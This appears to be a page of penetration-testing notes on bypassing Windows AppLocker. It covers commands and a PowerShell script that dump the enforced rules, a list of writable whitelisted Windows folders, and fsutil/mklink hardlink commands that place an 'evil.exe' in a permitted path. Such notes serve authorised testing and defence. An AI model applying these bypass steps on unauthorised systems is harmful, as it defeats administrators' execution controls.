Infrastructure penetration testing notes
  • Initial page
  • Table Of Content
  • Infrastructure testing
    • Enumeration
      • Packet Capture
      • Host Discovery
      • Services / Ports
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 53 - DNS
        • 67 - DHCP
        • 69 - TFTP
        • 79 - Finger
        • 88 - Kerberos
        • 111 - RPC
        • 113 - ident
        • 135 - MSRPC
        • 137 - Netbios
        • 139/445 - SMB
        • 161 - SNMP
        • 177 - XDMCP
        • 363 - LDAP
        • 443 - HTTPS
        • 500 - IKE (IPSEC)
        • 512/513/514 - R Services
        • 623 - IPMI
        • 873 - RSYNC
        • 1099 - Java RMI
        • 1433 - Microsoft SQL
        • 1521 - Oracle DB
        • 2049 - NFS
        • 3306 - MySQL
        • 3389 - RDP
        • 5432 - PostgresSQL
        • 5900 - VNC
        • 5985 - WinRM
        • 6000 - X11
        • 6379 - Redis
        • 8080 - Jenkins
        • 11211 - Memcached
        • RDS
        • SQLite
        • Docker
      • IPV6
        • Scanning
        • Enumeration
        • Transfering files
        • Pivoting and routes
        • THC IPv6
    • Gaining Access
      • IP Forwarding
      • VLAN Information
      • Psexec
      • Upgrading shell
      • Reverse Shells One-Liners
      • Bruteforce
      • MITM cleartext protocols
      • Null session
      • LLMNR / NBT NS Spoofing
      • Port knocking
      • Downloading/Transfer files
      • Remote Desktop
      • NAC Bypass
      • Pass-The-Hash
    • Exploitation
      • Solaris
      • IPv6
      • Windows
        • Compiling Code
        • SMB Vulnerabilities
        • Kerberos Attacks
    • Privilege Escalation
      • Situational Awareness
        • Linux
        • Windows
          • Registry
          • PowerView
          • FSMO Roles
      • Windows
        • Disable Apps and Firewall
        • Add user script
        • UAC Bypass
        • icacls
        • Running services
        • Common Exploits
      • Linux
        • SUID Shell script
        • CVE-2019-14287
        • Kernel exploit
      • Solaris
      • FreeBSD
      • Automated tools
      • Metasploit Modules
      • Password Dumping
    • Breakout
      • LOLBas
      • powershell constrained language byass
      • Alternatives to command prompt
      • Windows utilities
      • Applocker
      • Restricted shells
      • Environmental Variables / Bypassing Path Restrictions
      • Docker escape
      • Just Enough Administration (JEA)
    • Presistance
      • Windows
    • Pivoting
      • Adding routes
    • Password Cracking
      • Hashcat
      • John
      • Cisco Passwords
      • Passwords Lists
      • Generating wordlist
    • Tools
      • Nishang
      • UACME
      • Bypass-UAC
      • MSBuildAPICaller
      • Impacket
      • SharpPersist
      • Terminals
      • IP Calculation
      • pwsh
      • psTools / Sysinternals
      • Unlock applocker
      • enum4linux
      • Bloodhound
        • aclpwn
      • mitm6
      • Enyx
      • nfsshell
      • PowerUpSQL
      • Metasploit
        • msfvenom
    • Others
Powered by GitBook
On this page
  • View AppLocker policy
  • PowerShell
  • Bypass
  • Folders which are whitelisted
  • Tools
  • Resources

Was this helpful?

  1. Infrastructure testing
  2. Breakout

Applocker

advances the app control features and functionality of Software Restriction Policies.

PreviousWindows utilitiesNextRestricted shells

Last updated 4 years ago

Was this helpful?

AppLocker advances the app control features and functionality of Software Restriction Policies. AppLocker contains new capabilities and extensions that allow you to create rules to allow or deny apps from running based on unique identities of files and to specify which users or groups can run those apps.

Applocker prevent message look like this:

Program 'a.exe' failed to run: This program is blocked by group policy. For more information, contact your system administrator At line:1 char:1

View AppLocker policy

User has a folder which is exempt from AppLocker Policy 

(Get-AppLockerPolicy -Local).RuleCollections 
or
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse 
or
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\560d03c2-b277-4331-8c59-bc7d4eb08359

Example for Applocker

PowerShell

There is a powershell module named AppLocker, which can query the AppLocker rules that are enforced on the current system. Below is a simple powershell script that outputs the rules in a readable format so you can use this information to bypass them.

Import-Module AppLocker
[xml]$data = Get-AppLockerPolicy -effective -xml

# Extracts All Rules and print them.
Write-Output "[+] Printing Applocker Rules [+]`n"
($data.AppLockerPolicy.RuleCollection | ? { $_.EnforcementMode -match "Enabled" }) | ForEach-Object -Process {
    Write-Output ($_.FilePathRule | Where-Object {$_.Name -NotLike "(Default Rule)*"}) | ForEach-Object -Process {Write-Output "=== File Path Rule ===`n`n Rule Name : $($_.Name) `n Condition : $($_.Conditions.FilePathCondition.Path)`n Description: $($_.Description) `n Group/SID : $($_.UserOrGroupSid)`n`n"}
    Write-Output ($_.FileHashRule) | ForEach-Object -Process { Write-Output "=== File Hash Rule ===`n`n Rule Name : $($_.Name) `n File Name :  $($_.Conditions.FileHashCondition.FileHash.SourceFileName) `n Hash type : $($_.Conditions.FileHashCondition.FileHash.Type) `n Hash :  $($_.Conditions.FileHashCondition.FileHash.Data) `n Description: $($_.Description) `n Group/SID : $($_.UserOrGroupSid)`n`n"}
    Write-Output ($_.FilePublisherRule | Where-Object {$_.Name -NotLike "(Default Rule)*"}) | ForEach-Object -Process {Write-Output "=== File Publisher Rule ===`n`n Rule Name : $($_.Name) `n PublisherName : $($_.Conditions.FilePublisherCondition.PublisherName) `n ProductName : $($_.Conditions.FilePublisherCondition.ProductName) `n BinaryName : $($_.Conditions.FilePublisherCondition.BinaryName) `n BinaryVersion Min. : $($_.Conditions.FilePublisherCondition.BinaryVersionRange.LowSection) `n BinaryVersion Max. : $($_.Conditions.FilePublisherCondition.BinaryVersionRange.HighSection) `n Description: $($_.Description) `n Group/SID : $($_.UserOrGroupSid)`n`n"}
}

Bypass

By default allows execution of anything in:

%WINDIR%\*

%PROGRAMFILES%\*

Folders which are whitelisted 

C:\Windows\Tasks  
C:\Windows\Temp  
C:\windows\tracing 
C:\Windows\Registration\CRMLog 
C:\Windows\System32\FxsTmp 
C:\Windows\System32\com\dmp 
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys 
C:\Windows\System32\spool\PRINTERS 
C:\Windows\System32\spool\SERVERS 
C:\Windows\System32\spool\drivers\color 
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter 
C:\Windows\SysWOW64\FxsTmp 
C:\Windows\SysWOW64\com\dmp 
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter 
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

if you can place a file or folder into the path you become the owner of that object and you can change the ACL either in GUI or using ICALS. That includes adding Execute rights and more. If deny execute is inherit you can either disable inheritance or you can use hardlink to a binary file in another folder using one of these commands:

fsutil hardlink create c:\windows\system32\fxstmp\evil.exe c:\myfolder\plantedfile.exe

mklink /h c:\windows\system32\fxstmp\evil.exe c:\myfolder\plantedfile.exe

You can check the for additional paths by running accesschk from sysinternals and supplying these commands: 

accesschk -w -s -q -u Users "C:\Program Files" >> programfiles.txt 
accesschk -w -s -q -u Everyone "C:\Program Files" >> programfiles.txt 
accesschk -w -s -q -u "Authenticated Users" "C:\Program Files" >> programfiles.txt 
accesschk -w -s -q -u Interactive "C:\Program Files" >> programfiles.txt 

accesschk -w -s -q -u Users "C:\Program Files (x86)" >> programfilesx86.txt 
accesschk -w -s -q -u Everyone "C:\Program Files (x86)" >> programfilesx86.txt 
accesschk -w -s -q -u "Authenticated Users" "C:\Program Files (x86)" >> programfilesx86.txt 
accesschk -w -s -q -u Interactive "C:\Program Files (x86)" >> programfilesx86.txt 

accesschk -w -s -q -u Users "C:\Windows" >> windows.txt 
accesschk -w -s -q -u Everyone "C:\Windows" >> windows.txt 
accesschk -w -s -q -u "Authenticated Users" "C:\Windows" >> windows.txt 
accesschk -w -s -q -u Interactive "C:\Windows" >> windows.txt

Tools

Resources

- Microsoft Applocker evasion tool

- Living Off The Land Binaries And Scripts

unlock
LOLBas
https://blog.pwn.al/security/applocker/bypass/custom/rules/windows/2018/09/13/applocker-custom-rules-bypass.html